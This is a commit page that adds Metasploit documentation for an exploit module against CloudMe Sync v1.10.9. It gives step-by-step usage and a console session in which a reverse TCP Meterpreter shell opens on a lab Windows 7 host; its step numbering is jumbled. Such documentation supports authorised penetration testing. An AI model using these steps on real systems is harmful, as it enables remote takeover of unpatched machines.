Browse Source

CloudMe Sync Client documentation

Daniel Teixeira 2 years ago
parent
commit
ff3b318abd
No account linked to committer's email address
1 changed files with 66 additions and 0 deletions
  1. 66
    0
      documentation/modules/exploit/windows/misc/cloudme_sync.md

+ 66
- 0
documentation/modules/exploit/windows/misc/cloudme_sync.md View File

@@ -0,0 +1,66 @@
1
+
2
+## Verification Steps
3
+    1. Install CloudMe for Desktop version `v1.10.9`
4
+  2. Create a free account and start the applicaton
5
+  6. Start `msfconsole`
6
+    4. Do `use exploit/windows/misc/cloudme_sync`
7
+    5. Do `set RHOST ip`
8
+  11. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
9
+  12. Do `set LHOST ip`
10
+  13. Do `exploit`
11
+  14. Verify the Meterpreter session is opened
12
+
13
+## Scenarios
14
+
15
+### CloudMe Sync client application on Windows 7 SP1
16
+
17
+```
18
+msf > use exploit/windows/misc/cloudme_sync 
19
+msf exploit(windows/misc/cloudme_sync) > show options 
20
+
21
+Module options (exploit/windows/misc/cloudme_sync):
22
+
23
+   Name   Current Setting  Required  Description
24
+   ----   ---------------  --------  -----------
25
+   RHOST  172.16.40.148    yes       The target address
26
+   RPORT  8888             yes       The target port (TCP)
27
+
28
+
29
+Payload options (windows/meterpreter/reverse_tcp):
30
+
31
+   Name      Current Setting  Required  Description
32
+   ----      ---------------  --------  -----------
33
+   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
34
+   LHOST     172.16.40.5      yes       The listen address
35
+   LPORT     4444             yes       The listen port
36
+
37
+
38
+Exploit target:
39
+
40
+   Id  Name
41
+   --  ----
42
+   0   CloudMe Sync v1.10.9
43
+
44
+
45
+msf exploit(windows/misc/cloudme_sync) > set RHOST 172.16.40.148
46
+RHOST => 172.16.40.148
47
+msf exploit(windows/misc/cloudme_sync) > set PAYLOAD windows/meterpreter/reverse_tcp
48
+PAYLOAD => windows/meterpreter/reverse_tcp
49
+msf exploit(windows/misc/cloudme_sync) > set LHOST 172.16.40.5 
50
+LHOST => 172.16.40.5
51
+msf exploit(windows/misc/cloudme_sync) > exploit 
52
+
53
+[*] Started reverse TCP handler on 172.16.40.5:4444 
54
+[*] Sending stage (179779 bytes) to 172.16.40.148
55
+[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.148:57185) at 2018-02-19 12:35:21 +0000
56
+
57
+meterpreter > sysinfo 
58
+Computer        : PC
59
+OS              : Windows 7 (Build 7601, Service Pack 1).
60
+Architecture    : x86
61
+System Language : pt_PT
62
+Domain          : WORKGROUP
63
+Logged On Users : 1
64
+Meterpreter     : x86/windows
65
+meterpreter >
66
+```

Loading…
Cancel
Save